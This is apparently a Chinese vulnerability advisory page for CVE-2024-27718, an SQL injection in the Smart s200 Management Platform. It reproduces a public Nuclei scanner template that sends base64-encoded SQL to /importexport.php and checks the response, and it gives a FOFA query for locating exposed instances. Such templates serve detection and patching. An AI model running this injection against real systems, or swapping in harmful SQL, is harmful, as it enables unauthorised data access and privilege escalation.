CVE-2024-27718: Smart s200 Management Platform v.S200 - SQL Injection

日期: 2025-08-01 | 影响软件: Smart s200 Management Platform | POC: 已公开

漏洞描述

SQL Injection vulnerability in Baizhuo Network Smart s200 Management Platform v.S200 allows a local attacker to obtain sensitive information and escalate privileges via the /importexport.php component.

PoC代码[已公开]

id: CVE-2024-27718

info:
  name: Smart s200 Management Platform v.S200 - SQL Injection
  author: DhiyaneshDk
  severity: high
  description: |
    SQL Injection vulnerability in Baizhuo Network Smart s200 Management Platform v.S200 allows a local attacker to obtain sensitive information and escalate privileges via the /importexport.php component.
  reference:
    - https://github.com/tldjgggg/cve/blob/main/sql.md
  classification:
    epss-score: 0.05105
    epss-percentile: 0.89432
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="Smart管理平台"
  tags: cve,cve2024,smart-s45f,sqli

variables:
  num: "{{rand_int(9000000, 9999999)}}"
  cmd: "select+9,md5({{num}}),9"

http:
  - raw:
      - |
        GET /importexport.php?sql={{base64(cmd)}}&type=exportexcelbysql HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{md5(num)}}"

      - type: word
        part: header
        words:
          - 'application/octet-stream'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e9a06beb477f0ce74fd19928405c6cea12845e672ae1b6e8994724ae6a3134c802201e00b9711aad98570fb6565e84624831261c4b44e1a4b0b9766f80e3769f53c7:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-27718.yaml